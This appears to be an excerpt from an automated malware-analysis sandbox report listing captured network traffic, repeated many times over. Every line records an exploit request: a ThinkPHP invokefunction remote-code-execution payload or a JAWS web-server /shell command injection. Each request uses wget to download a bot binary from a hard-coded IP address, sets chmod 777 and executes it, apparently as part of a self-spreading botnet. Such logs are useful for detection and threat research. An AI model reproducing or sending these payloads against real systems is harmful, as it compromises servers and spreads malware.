      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
